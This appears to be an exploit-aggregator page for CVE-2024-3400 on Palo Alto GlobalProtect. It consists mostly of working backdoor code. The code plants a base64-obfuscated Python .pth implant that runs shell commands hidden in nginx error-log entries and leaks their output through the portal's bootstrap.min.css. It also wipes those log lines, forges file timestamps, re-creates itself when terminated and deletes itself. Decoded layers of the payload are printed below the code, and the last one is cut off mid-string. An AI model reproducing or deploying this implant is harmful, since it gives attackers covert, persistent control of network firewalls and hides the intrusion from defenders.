Share
## https://sploitus.com/exploit?id=43FCABFE-FFD3-5751-AE2E-D9D2B1323BB2
# CVE-2024-3400
```
import os,base64,time
systempth = "/usr/lib/python3.6/site-packages/system.pth"
with open(systempth,'wb') as f:
f.write(b'''import base64;exec(base64.b64decode(b"CgoKZGVmIGNoZWNrKCk6CiAgICBpbXBvcnQgb3Msc3VicHJvY2Vzcyx0aW1lLHN5cwoKCiAgICBkZWYgc3RhcnRfcHJvY2VzcygpOgogICAgICAgIGltcG9ydCBiYXNlNjQKICAgICAgICBmdW5jdGlvbmNvZGUgPSBiIlpHVm1JRjlmYldGcGJpZ3BPZzBLSUNBZ0lHbHRjRzl5ZENCMGFISmxZV1JwYm1jc2RHbHRaU3h2Y3l4eVpTeGlZWE5sTmpRTkNnMEtEUW9OQ2lBZ0lDQmtaV1lnY21WemRHOXlaU2hqYzNOZmNHRjBhQ3hqYjI1MFpXNTBMR0YwYVcxbExHMTBhVzFsS1RvTkNpQWdJQ0FnSUNBZ2FXMXdiM0owSUc5ekxIUnBiV1VOQ2lBZ0lDQWdJQ0FnZEdsdFpTNXpiR1ZsY0NneE5Ta05DaUFnSUNBZ0lDQWdkMmwwYUNCdmNHVnVLR056YzE5d1lYUm9MQ2QzSnlrZ1lYTWdaam9OQ2lBZ0lDQWdJQ0FnSUNBZ0lHWXVkM0pwZEdVb1kyOXVkR1Z1ZENrTkNpQWdJQ0FnSUNBZ2IzTXVkWFJwYldVb1kzTnpYM0JoZEdnc0tHRjBhVzFsTEcxMGFXMWxLU2tOQ2lBZ0lDQWdJQ0FnRFFvTkNpQWdJQ0FnSUNBZ0RRb2dJQ0FnWkdWbUlGOWZhWE5mZDJodmJHVmZhRzkxY2lncE9nMEtJQ0FnSUNBZ0lDQm1jbTl0SUdSaGRHVjBhVzFsSUdsdGNHOXlkQ0JrWVhSbGRHbHRaUTBLSUNBZ0lDQWdJQ0JqZFhKeVpXNTBYM1JwYldVZ1BTQmtZWFJsZEdsdFpTNXViM2NvS1M1MGFXMWxLQ2tOQ2lBZ0lDQWdJQ0FnY21WMGRYSnVJR04xY25KbGJuUmZkR2x0WlM1dGFXNTFkR1VnSVQwZ01DQmhibVFnWTNWeWNtVnVkRjkwYVcxbExuTmxZMjl1WkNBOVBTQXdEUW9nSUNBZ1kzTnpYM0JoZEdnZ1BTQW5MM1poY2k5aGNIQjNaV0l2YzNOc2RuQnVaRzlqY3k5bmJHOWlZV3d0Y0hKdmRHVmpkQzl3YjNKMFlXd3ZZM056TDJKdmIzUnpkSEpoY0M1dGFXNHVZM056SncwS0lDQWdJR052Ym5SbGJuUWdQU0J2Y0dWdUtHTnpjMTl3WVhSb0tTNXlaV0ZrS0NrTkNpQWdJQ0JoZEdsdFpUMXZjeTV3WVhSb0xtZGxkR0YwYVcxbEtHTnpjMTl3WVhSb0tRMEtJQ0FnSUcxMGFXMWxQVzl6TG5CaGRHZ3VaMlYwYlhScGJXVW9ZM056WDNCaGRHZ3BEUW9OQ2lBZ0lDQjNhR2xzWlNCVWNuVmxPZzBLSUNBZ0lDQWdJQ0IwY25rNkRRb2dJQ0FnSUNBZ0lDQWdJQ0JUU0VWTVRGOVFRVlJVUlZKT0lEMGdKMmx0WjF4YktGdGhMWHBCTFZvd0xUa3JMejFkS3lsY1hTY05DaUFnSUNBZ0lDQWdJQ0FnSUd4cGJtVnpJRDBnVzEwTkNpQWdJQ0FnSUNBZ0lDQWdJRmRTU1ZSRlgwWk1RVWNnUFNCR1lXeHpaUTBLSUNBZ0lDQWdJQ0FnSUNBZ1ptOXlJR3hwYm1VZ2FXNGdiM0JsYmlnaUwzWmhjaTlzYjJjdmNHRnVMM056Ykhad2JsOXVaM2hmWlhKeWIzSXViRzluSWl4bGNuSnZjbk05SW1sbmJtOXlaU0lwTG5KbFlXUnNhVzVsY3lncE9nMEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lISnpkQ0E5SUhKbExuTmxZWEpqYUNoVFNFVk1URjlRUVZSVVJWSk9MR3hwYm1VcERRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2FXWWdjbk4wT2cwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQlhVa2xVUlY5R1RFRkhJRDBnVkhKMVpRMEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JqYldRZ1BTQmlZWE5sTmpRdVlqWTBaR1ZqYjJSbEtISnpkQzVuY205MWNDZ3hLU2t1WkdWamIyUmxLQ2tOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2RISjVPZzBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdiM1YwY0hWMElEMGdiM011Y0c5d1pXNG9ZMjFrS1M1eVpXRmtLQ2tOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSGRwZEdnZ2IzQmxiaWhqYzNOZmNHRjBhQ3dpWVNJcElHRnpJR1k2RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1ppNTNjbWwwWlNnaUx5b2lLMjkxZEhCMWRDc2lLaThpS1EwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQmxlR05sY0hRZ1JYaGpaWEIwYVc5dUlHRnpJR1U2RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0J3WVhOekRRb05DaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnWTI5dWRHbHVkV1VOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JzYVc1bGN5NWhjSEJsYm1Rb2JHbHVaU2tOQ2lBZ0lDQWdJQ0FnSUNBZ0lHbG1JRmRTU1ZSRlgwWk1RVWM2RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnWVhScGJXVTliM011Y0dGMGFDNW5aWFJoZEdsdFpTZ2lMM1poY2k5c2IyY3ZjR0Z1TDNOemJIWndibDl1WjNoZlpYSnliM0l1Ykc5bklpa05DaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQnRkR2x0WlQxdmN5NXdZWFJvTG1kbGRHMTBhVzFsS0NJdmRtRnlMMnh2Wnk5d1lXNHZjM05zZG5CdVgyNW5lRjlsY25KdmNpNXNiMmNpS1EwS0RRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2QybDBhQ0J2Y0dWdUtDSXZkbUZ5TDJ4dlp5OXdZVzR2YzNOc2RuQnVYMjVuZUY5bGNuSnZjaTVzYjJjaUxDSjNJaWtnWVhNZ1pqb05DaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnWmk1M2NtbDBaV3hwYm1WektHeHBibVZ6S1EwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUc5ekxuVjBhVzFsS0NJdmRtRnlMMnh2Wnk5d1lXNHZjM05zZG5CdVgyNW5lRjlsY25KdmNpNXNiMmNpTENoaGRHbHRaU3h0ZEdsdFpTa3BEUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhVzF3YjNKMElIUm9jbVZoWkdsdVp3MEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lIUm9jbVZoWkdsdVp5NVVhSEpsWVdRb2RHRnlaMlYwUFhKbGMzUnZjbVVzWVhKbmN6MG9ZM056WDNCaGRHZ3NZMjl1ZEdWdWRDeGhkR2x0WlN4dGRHbHRaU2twTG5OMFlYSjBLQ2tOQ2lBZ0lDQWdJQ0FnWlhoalpYQjBPZzBLSUNBZ0lDQWdJQ0FnSUNBZ2NHRnpjdzBLSUNBZ0lDQWdJQ0IwYVcxbExuTnNaV1Z3S0RJcERRb05DZzBLYVcxd2IzSjBJSFJvY21WaFpHbHVaeXgwYVcxbERRcDBhSEpsWVdScGJtY3VWR2h5WldGa0tIUmhjbWRsZEQxZlgyMWhhVzRwTG5OMFlYSjBLQ2tOQ2cwSyIKICAgICAgICBleGVjKGJhc2U2NC5iNjRkZWNvZGUoZnVuY3Rpb25jb2RlKSkgICAgICAgIAoKICAgIGlmIGIiL3Vzci9sb2NhbC9iaW4vbW9uaXRvciBtcCIgaW4gb3BlbigiL3Byb2Mvc2VsZi9jbWRsaW5lIiwicmIiKS5yZWFkKCkucmVwbGFjZShiIlx4MDAiLGIiICIpIDoKICAgICAgICB0cnk6CiAgICAgICAgICAgIHN0YXJ0X3Byb2Nlc3MoKQogICAgICAgIGV4Y2VwdCBLZXlib2FyZEludGVycnVwdCBhcyBlOgogICAgICAgICAgICBwcmludChlKQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb24gYXMgZToKICAgICAgICAgICAgcHJpbnQoZSkKICAgICAgICByZXR1cm4gVHJ1ZQogICAgZWxzZToKICAgICAgICByZXR1cm4gRmFsc2UgCgoKZGVmIHByb3RlY3QoKToKICAgIGltcG9ydCBvcyxzaWduYWwKICAgIHN5c3RlbXB0aCA9ICIvdXNyL2xpYi9weXRob24zLjYvc2l0ZS1wYWNrYWdlcy9zeXN0ZW0ucHRoIgogICAgY29udGVudCA9IG9wZW4oc3lzdGVtcHRoKS5yZWFkKCkKICAgICMgb3MudW5saW5rKF9fZmlsZV9fKQogICAgZGVmIHN0b3Aoc2lnLGZyYW1lKToKICAgICAgICBpZiBub3Qgb3MucGF0aC5leGlzdHMoc3lzdGVtcHRoKToKICAgICAgICAgICAgd2l0aCBvcGVuKHN5c3RlbXB0aCwidyIpIGFzIGY6CiAgICAgICAgICAgICAgICBmLndyaXRlKGNvbnRlbnQpCgogICAgc2lnbmFsLnNpZ25hbChzaWduYWwuU0lHVEVSTSxzdG9wKQoKCnByb3RlY3QoKQpjaGVjaygpCg=="))''')
atime=os.path.getatime(os.__file__)
mtime=os.path.getmtime(os.__file__)
os.utime(systempth,(atime,mtime))
os.unlink(__file__)
import glob
os.unlink(glob.glob("/opt/pancfg/mgmt/licenses/PA_VM`*")[0])
```
"CgoKZGVmIGNoZWNrKCk6CiAgICBpbXBvcnQgb3Msc3VicHJvY2Vzcyx0aW1lLHN5cwoKCiAgICBkZWYgc3RhcnRfcHJvY2VzcygpOgogICAgICAgIGltcG9ydCBiYXNlNjQKICAgICAgICBmdW5jdGlvbmNvZGUgPSBiIlpHVm1JRjlmYldGcGJpZ3BPZzBLSUNBZ0lHbHRjRzl5ZENCMGFISmxZV1JwYm1jc2RHbHRaU3h2Y3l4eVpTeGlZWE5sTmpRTkNnMEtEUW9OQ2lBZ0lDQmtaV1lnY21WemRHOXlaU2hqYzNOZmNHRjBhQ3hqYjI1MFpXNTBMR0YwYVcxbExHMTBhVzFsS1RvTkNpQWdJQ0FnSUNBZ2FXMXdiM0owSUc5ekxIUnBiV1VOQ2lBZ0lDQWdJQ0FnZEdsdFpTNXpiR1ZsY0NneE5Ta05DaUFnSUNBZ0lDQWdkMmwwYUNCdmNHVnVLR056YzE5d1lYUm9MQ2QzSnlrZ1lYTWdaam9OQ2lBZ0lDQWdJQ0FnSUNBZ0lHWXVkM0pwZEdVb1kyOXVkR1Z1ZENrTkNpQWdJQ0FnSUNBZ2IzTXVkWFJwYldVb1kzTnpYM0JoZEdnc0tHRjBhVzFsTEcxMGFXMWxLU2tOQ2lBZ0lDQWdJQ0FnRFFvTkNpQWdJQ0FnSUNBZ0RRb2dJQ0FnWkdWbUlGOWZhWE5mZDJodmJHVmZhRzkxY2lncE9nMEtJQ0FnSUNBZ0lDQm1jbTl0SUdSaGRHVjBhVzFsSUdsdGNHOXlkQ0JrWVhSbGRHbHRaUTBLSUNBZ0lDQWdJQ0JqZFhKeVpXNTBYM1JwYldVZ1BTQmtZWFJsZEdsdFpTNXViM2NvS1M1MGFXMWxLQ2tOQ2lBZ0lDQWdJQ0FnY21WMGRYSnVJR04xY25KbGJuUmZkR2x0WlM1dGFXNTFkR1VnSVQwZ01DQmhibVFnWTNWeWNtVnVkRjkwYVcxbExuTmxZMjl1WkNBOVBTQXdEUW9nSUNBZ1kzTnpYM0JoZEdnZ1BTQW5MM1poY2k5aGNIQjNaV0l2YzNOc2RuQnVaRzlqY3k5bmJHOWlZV3d0Y0hKdmRHVmpkQzl3YjNKMFlXd3ZZM056TDJKdmIzUnpkSEpoY0M1dGFXNHVZM056SncwS0lDQWdJR052Ym5SbGJuUWdQU0J2Y0dWdUtHTnpjMTl3WVhSb0tTNXlaV0ZrS0NrTkNpQWdJQ0JoZEdsdFpUMXZjeTV3WVhSb0xtZGxkR0YwYVcxbEtHTnpjMTl3WVhSb0tRMEtJQ0FnSUcxMGFXMWxQVzl6TG5CaGRHZ3VaMlYwYlhScGJXVW9ZM056WDNCaGRHZ3BEUW9OQ2lBZ0lDQjNhR2xzWlNCVWNuVmxPZzBLSUNBZ0lDQWdJQ0IwY25rNkRRb2dJQ0FnSUNBZ0lDQWdJQ0JUU0VWTVRGOVFRVlJVUlZKT0lEMGdKMmx0WjF4YktGdGhMWHBCTFZvd0xUa3JMejFkS3lsY1hTY05DaUFnSUNBZ0lDQWdJQ0FnSUd4cGJtVnpJRDBnVzEwTkNpQWdJQ0FnSUNBZ0lDQWdJRmRTU1ZSRlgwWk1RVWNnUFNCR1lXeHpaUTBLSUNBZ0lDQWdJQ0FnSUNBZ1ptOXlJR3hwYm1VZ2FXNGdiM0JsYmlnaUwzWmhjaTlzYjJjdmNHRnVMM056Ykhad2JsOXVaM2hmWlhKeWIzSXViRzluSWl4bGNuSnZjbk05SW1sbmJtOXlaU0lwTG5KbFlXUnNhVzVsY3lncE9nMEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lISnpkQ0E5SUhKbExuTmxZWEpqYUNoVFNFVk1URjlRUVZSVVJWSk9MR3hwYm1VcERRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2FXWWdjbk4wT2cwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQlhVa2xVUlY5R1RFRkhJRDBnVkhKMVpRMEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JqYldRZ1BTQmlZWE5sTmpRdVlqWTBaR1ZqYjJSbEtISnpkQzVuY205MWNDZ3hLU2t1WkdWamIyUmxLQ2tOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2RISjVPZzBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdiM1YwY0hWMElEMGdiM011Y0c5d1pXNG9ZMjFrS1M1eVpXRmtLQ2tOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSGRwZEdnZ2IzQmxiaWhqYzNOZmNHRjBhQ3dpWVNJcElHRnpJR1k2RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ1ppNTNjbWwwWlNnaUx5b2lLMjkxZEhCMWRDc2lLaThpS1EwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQmxlR05sY0hRZ1JYaGpaWEIwYVc5dUlHRnpJR1U2RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0J3WVhOekRRb05DaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnWTI5dWRHbHVkV1VOQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JzYVc1bGN5NWhjSEJsYm1Rb2JHbHVaU2tOQ2lBZ0lDQWdJQ0FnSUNBZ0lHbG1JRmRTU1ZSRlgwWk1RVWM2RFFvZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnWVhScGJXVTliM011Y0dGMGFDNW5aWFJoZEdsdFpTZ2lMM1poY2k5c2IyY3ZjR0Z1TDNOemJIWndibDl1WjNoZlpYSnliM0l1Ykc5bklpa05DaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQnRkR2x0WlQxdmN5NXdZWFJvTG1kbGRHMTBhVzFsS0NJdmRtRnlMMnh2Wnk5d1lXNHZjM05zZG5CdVgyNW5lRjlsY25KdmNpNXNiMmNpS1EwS0RRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ2QybDBhQ0J2Y0dWdUtDSXZkbUZ5TDJ4dlp5OXdZVzR2YzNOc2RuQnVYMjVuZUY5bGNuSnZjaTVzYjJjaUxDSjNJaWtnWVhNZ1pqb05DaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnWmk1M2NtbDBaV3hwYm1WektHeHBibVZ6S1EwS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUc5ekxuVjBhVzFsS0NJdmRtRnlMMnh2Wnk5d1lXNHZjM05zZG5CdVgyNW5lRjlsY25KdmNpNXNiMmNpTENoaGRHbHRaU3h0ZEdsdFpTa3BEUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdhVzF3YjNKMElIUm9jbVZoWkdsdVp3MEtJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lIUm9jbVZoWkdsdVp5NVVhSEpsWVdRb2RHRnlaMlYwUFhKbGMzUnZjbVVzWVhKbmN6MG9ZM056WDNCaGRHZ3NZMjl1ZEdWdWRDeGhkR2x0WlN4dGRHbHRaU2twTG5OMFlYSjBLQ2tOQ2lBZ0lDQWdJQ0FnWlhoalpYQjBPZzBLSUNBZ0lDQWdJQ0FnSUNBZ2NHRnpjdzBLSUNBZ0lDQWdJQ0IwYVcxbExuTnNaV1Z3S0RJcERRb05DZzBLYVcxd2IzSjBJSFJvY21WaFpHbHVaeXgwYVcxbERRcDBhSEpsWVdScGJtY3VWR2h5WldGa0tIUmhjbWRsZEQxZlgyMWhhVzRwTG5OMFlYSjBLQ2tOQ2cwSyIKICAgICAgICBleGVjKGJhc2U2NC5iNjRkZWNvZGUoZnVuY3Rpb25jb2RlKSkgICAgICAgIAoKICAgIGlmIGIiL3Vzci9sb2NhbC9iaW4vbW9uaXRvciBtcCIgaW4gb3BlbigiL3Byb2Mvc2VsZi9jbWRsaW5lIiwicmIiKS5yZWFkKCkucmVwbGFjZShiIlx4MDAiLGIiICIpIDoKICAgICAgICB0cnk6CiAgICAgICAgICAgIHN0YXJ0X3Byb2Nlc3MoKQogICAgICAgIGV4Y2VwdCBLZXlib2FyZEludGVycnVwdCBhcyBlOgogICAgICAgICAgICBwcmludChlKQogICAgICAgIGV4Y2VwdCBFeGNlcHRpb24gYXMgZToKICAgICAgICAgICAgcHJpbnQoZSkKICAgICAgICByZXR1cm4gVHJ1ZQogICAgZWxzZToKICAgICAgICByZXR1cm4gRmFsc2UgCgoKZGVmIHByb3RlY3QoKToKICAgIGltcG9ydCBvcyxzaWduYWwKICAgIHN5c3RlbXB0aCA9ICIvdXNyL2xpYi9weXRob24zLjYvc2l0ZS1wYWNrYWdlcy9zeXN0ZW0ucHRoIgogICAgY29udGVudCA9IG9wZW4oc3lzdGVtcHRoKS5yZWFkKCkKICAgICMgb3MudW5saW5rKF9fZmlsZV9fKQogICAgZGVmIHN0b3Aoc2lnLGZyYW1lKToKICAgICAgICBpZiBub3Qgb3MucGF0aC5leGlzdHMoc3lzdGVtcHRoKToKICAgICAgICAgICAgd2l0aCBvcGVuKHN5c3RlbXB0aCwidyIpIGFzIGY6CiAgICAgICAgICAgICAgICBmLndyaXRlKGNvbnRlbnQpCgogICAgc2lnbmFsLnNpZ25hbChzaWduYWwuU0lHVEVSTSxzdG9wKQoKCnByb3RlY3QoKQpjaGVjaygpCg=="
## The base64 decoding result is as follows
```
def check():
import os,subprocess,time,sys
def start_process():
import base64
functioncode = b"ZGVmIF9fbWFpbigpOg0KICAgIGltcG9ydCB0aHJlYWRpbmcsdGltZSxvcyxyZSxiYXNlNjQNCg0KDQoNCiAgICBkZWYgcmVzdG9yZShjc3NfcGF0aCxjb250ZW50LGF0aW1lLG10aW1lKToNCiAgICAgICAgaW1wb3J0IG9zLHRpbWUNCiAgICAgICAgdGltZS5zbGVlcCgxNSkNCiAgICAgICAgd2l0aCBvcGVuKGNzc19wYXRoLCd3JykgYXMgZjoNCiAgICAgICAgICAgIGYud3JpdGUoY29udGVudCkNCiAgICAgICAgb3MudXRpbWUoY3NzX3BhdGgsKGF0aW1lLG10aW1lKSkNCiAgICAgICAgDQoNCiAgICAgICAgDQogICAgZGVmIF9faXNfd2hvbGVfaG91cigpOg0KICAgICAgICBmcm9tIGRhdGV0aW1lIGltcG9ydCBkYXRldGltZQ0KICAgICAgICBjdXJyZW50X3RpbWUgPSBkYXRldGltZS5ub3coKS50aW1lKCkNCiAgICAgICAgcmV0dXJuIGN1cnJlbnRfdGltZS5taW51dGUgIT0gMCBhbmQgY3VycmVudF90aW1lLnNlY29uZCA9PSAwDQogICAgY3NzX3BhdGggPSAnL3Zhci9hcHB3ZWIvc3NsdnBuZG9jcy9nbG9iYWwtcHJvdGVjdC9wb3J0YWwvY3NzL2Jvb3RzdHJhcC5taW4uY3NzJw0KICAgIGNvbnRlbnQgPSBvcGVuKGNzc19wYXRoKS5yZWFkKCkNCiAgICBhdGltZT1vcy5wYXRoLmdldGF0aW1lKGNzc19wYXRoKQ0KICAgIG10aW1lPW9zLnBhdGguZ2V0bXRpbWUoY3NzX3BhdGgpDQoNCiAgICB3aGlsZSBUcnVlOg0KICAgICAgICB0cnk6DQogICAgICAgICAgICBTSEVMTF9QQVRURVJOID0gJ2ltZ1xbKFthLXpBLVowLTkrLz1dKylcXScNCiAgICAgICAgICAgIGxpbmVzID0gW10NCiAgICAgICAgICAgIFdSSVRFX0ZMQUcgPSBGYWxzZQ0KICAgICAgICAgICAgZm9yIGxpbmUgaW4gb3BlbigiL3Zhci9sb2cvcGFuL3NzbHZwbl9uZ3hfZXJyb3IubG9nIixlcnJvcnM9Imlnbm9yZSIpLnJlYWRsaW5lcygpOg0KICAgICAgICAgICAgICAgIHJzdCA9IHJlLnNlYXJjaChTSEVMTF9QQVRURVJOLGxpbmUpDQogICAgICAgICAgICAgICAgaWYgcnN0Og0KICAgICAgICAgICAgICAgICAgICBXUklURV9GTEFHID0gVHJ1ZQ0KICAgICAgICAgICAgICAgICAgICBjbWQgPSBiYXNlNjQuYjY0ZGVjb2RlKHJzdC5ncm91cCgxKSkuZGVjb2RlKCkNCiAgICAgICAgICAgICAgICAgICAgdHJ5Og0KICAgICAgICAgICAgICAgICAgICAgICAgb3V0cHV0ID0gb3MucG9wZW4oY21kKS5yZWFkKCkNCiAgICAgICAgICAgICAgICAgICAgICAgIHdpdGggb3Blbihjc3NfcGF0aCwiYSIpIGFzIGY6DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgZi53cml0ZSgiLyoiK291dHB1dCsiKi8iKQ0KICAgICAgICAgICAgICAgICAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6DQogICAgICAgICAgICAgICAgICAgICAgICBwYXNzDQoNCiAgICAgICAgICAgICAgICAgICAgY29udGludWUNCiAgICAgICAgICAgICAgICBsaW5lcy5hcHBlbmQobGluZSkNCiAgICAgICAgICAgIGlmIFdSSVRFX0ZMQUc6DQogICAgICAgICAgICAgICAgYXRpbWU9b3MucGF0aC5nZXRhdGltZSgiL3Zhci9sb2cvcGFuL3NzbHZwbl9uZ3hfZXJyb3IubG9nIikNCiAgICAgICAgICAgICAgICBtdGltZT1vcy5wYXRoLmdldG10aW1lKCIvdmFyL2xvZy9wYW4vc3NsdnBuX25neF9lcnJvci5sb2ciKQ0KDQogICAgICAgICAgICAgICAgd2l0aCBvcGVuKCIvdmFyL2xvZy9wYW4vc3NsdnBuX25neF9lcnJvci5sb2ciLCJ3IikgYXMgZjoNCiAgICAgICAgICAgICAgICAgICAgZi53cml0ZWxpbmVzKGxpbmVzKQ0KICAgICAgICAgICAgICAgIG9zLnV0aW1lKCIvdmFyL2xvZy9wYW4vc3NsdnBuX25neF9lcnJvci5sb2ciLChhdGltZSxtdGltZSkpDQogICAgICAgICAgICAgICAgaW1wb3J0IHRocmVhZGluZw0KICAgICAgICAgICAgICAgIHRocmVhZGluZy5UaHJlYWQodGFyZ2V0PXJlc3RvcmUsYXJncz0oY3NzX3BhdGgsY29udGVudCxhdGltZSxtdGltZSkpLnN0YXJ0KCkNCiAgICAgICAgZXhjZXB0Og0KICAgICAgICAgICAgcGFzcw0KICAgICAgICB0aW1lLnNsZWVwKDIpDQoNCg0KaW1wb3J0IHRocmVhZGluZyx0aW1lDQp0aHJlYWRpbmcuVGhyZWFkKHRhcmdldD1fX21haW4pLnN0YXJ0KCkNCg0K"
exec(base64.b64decode(functioncode))
if b"/usr/local/bin/monitor mp" in open("/proc/self/cmdline","rb").read().replace(b"\x00",b" ") :
try:
start_process()
except KeyboardInterrupt as e:
print(e)
except Exception as e:
print(e)
return True
else:
return False
def protect():
import os,signal
systempth = "/usr/lib/python3.6/site-packages/system.pth"
content = open(systempth).read()
# os.unlink(__file__)
def stop(sig,frame):
if not os.path.exists(systempth):
with open(systempth,"w") as f:
f.write(content)
signal.signal(signal.SIGTERM,stop)
protect()
check()
```
"ZGVmIF9fbWFpbigpOg0KICAgIGltcG9ydCB0aHJlYWRpbmcsdGltZSxvcyxyZSxiYXNlNjQNCg0KDQoNCiAgICBkZWYgcmVzdG9yZShjc3NfcGF0aCxjb250ZW50LGF0aW1lLG10aW1lKToNCiAgICAgICAgaW1wb3J0IG9zLHRpbWUNCiAgICAgICAgdGltZS5zbGVlcCgxNSkNCiAgICAgICAgd2l0aCBvcGVuKGNzc19wYXRoLCd3JykgYXMgZjoNCiAgICAgICAgICAgIGYud3JpdGUoY29udGVudCkNCiAgICAgICAgb3MudXRpbWUoY3NzX3BhdGgsKGF0aW1lLG10aW1lKSkNCiAgICAgICAgDQoNCiAgICAgICAgDQogICAgZGVmIF9faXNfd2hvbGVfaG91cigpOg0KICAgICAgICBmcm9tIGRhdGV0aW1lIGltcG9ydCBkYXRldGltZQ0KICAgICAgICBjdXJyZW50X3RpbWUgPSBkYXRldGltZS5ub3coKS50aW1lKCkNCiAgICAgICAgcmV0dXJuIGN1cnJlbnRfdGltZS5taW51dGUgIT0gMCBhbmQgY3VycmVudF90aW1lLnNlY29uZCA9PSAwDQogICAgY3NzX3BhdGggPSAnL3Zhci9hcHB3ZWIvc3NsdnBuZG9jcy9nbG9iYWwtcHJvdGVjdC9wb3J0YWwvY3NzL2Jvb3RzdHJhcC5taW4uY3NzJw0KICAgIGNvbnRlbnQgPSBvcGVuKGNzc19wYXRoKS5yZWFkKCkNCiAgICBhdGltZT1vcy5wYXRoLmdldGF0aW1lKGNzc19wYXRoKQ0KICAgIG10aW1lPW9zLnBhdGguZ2V0bXRpbWUoY3NzX3BhdGgpDQoNCiAgICB3aGlsZSBUcnVlOg0KICAgICAgICB0cnk6DQogICAgICAgICAgICBTSEVMTF9QQVRURVJOID0gJ2ltZ1xbKFthLXpBLVowLTkrLz1dKylcXScNCiAgICAgICAgICAgIGxpbmVzID0gW10NCiAgICAgICAgICAgIFdSSVRFX0ZMQUcgPSBGYWxzZQ0KICAgICAgICAgICAgZm9yIGxpbmUgaW4gb3BlbigiL3Zhci9sb2cvcGFuL3NzbHZwbl9uZ3hfZXJyb3IubG9nIixlcnJvcnM9Imlnbm9yZSIpLnJlYWRsaW5lcygpOg0KICAgICAgICAgICAgICAgIHJzdCA9IHJlLnNlYXJjaChTSEVMTF9QQVRURVJOLGxpbmUpDQogICAgICAgICAgICAgICAgaWYgcnN0Og0KICAgICAgICAgICAgICAgICAgICBXUklURV9GTEFHID0gVHJ1ZQ0KICAgICAgICAgICAgICAgICAgICBjbWQgPSBiYXNlNjQuYjY0ZGVjb2RlKHJzdC5ncm91cCgxKSkuZGVjb2RlKCkNCiAgICAgICAgICAgICAgICAgICAgdHJ5Og0KICAgICAgICAgICAgICAgICAgICAgICAgb3V0cHV0ID0gb3MucG9wZW4oY21kKS5yZWFkKCkNCiAgICAgICAgICAgICAgICAgICAgICAgIHdpdGggb3Blbihjc3NfcGF0aCwiYSIpIGFzIGY6DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgZi53cml0ZSgiLyoiK291dHB1dCsiKi8iKQ0KICAgICAgICAgICAgICAgICAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6DQogICAgICAgICAgICAgICAgICAgICAgICBwYXNzDQoNCiAgICAgICAgICAgICAgICAgICAgY29udGludWUNCiAgICAgICAgICAgICAgICBsaW5lcy5hcHBlbmQobGluZSkNCiAgICAgICAgICAgIGlmIFdSSVRFX0ZMQUc6DQogICAgICAgICAgICAgICAgYXRpbWU9b3MucGF0aC5nZXRhdGltZSgiL3Zhci9sb2cvcGFuL3NzbHZwbl9uZ3hfZXJyb3IubG9nIikNCiAgICAgICAgICAgICAgICBtdGltZT1vcy5wYXRoLmdldG10aW1lKCIvdmFyL2xvZy9wYW4vc3NsdnBuX25neF9lcnJvci5sb2ciKQ0KDQogICAgICAgICAgICAgICAgd2l0aCBvcGVuKCIvdmFyL2xvZy9wYW4vc3NsdnBuX25neF9lcnJvci5sb2ciLCJ3IikgYXMgZjoNCiAgICAgICAgICAgICAgICAgICAgZi53cml0ZWxpbmVzKGxpbmVzKQ0KICAgICAgICAgICAgICAgIG9zLnV0aW1lKCIvdmFyL2xvZy9wYW4vc3NsdnBuX25neF9lcnJvci5sb2ciLChhdGltZSxtdGltZSkpDQogICAgICAgICAgICAgICAgaW1wb3J0IHRocmVhZGluZw0KICAgICAgICAgICAgICAgIHRocmVhZGluZy5UaHJlYWQodGFyZ2V0PXJlc3RvcmUsYXJncz0oY3NzX3BhdGgsY29udGVudCxhdGltZSxtdGltZSkpLnN0YXJ0KCkNCiAgICAgICAgZXhjZXB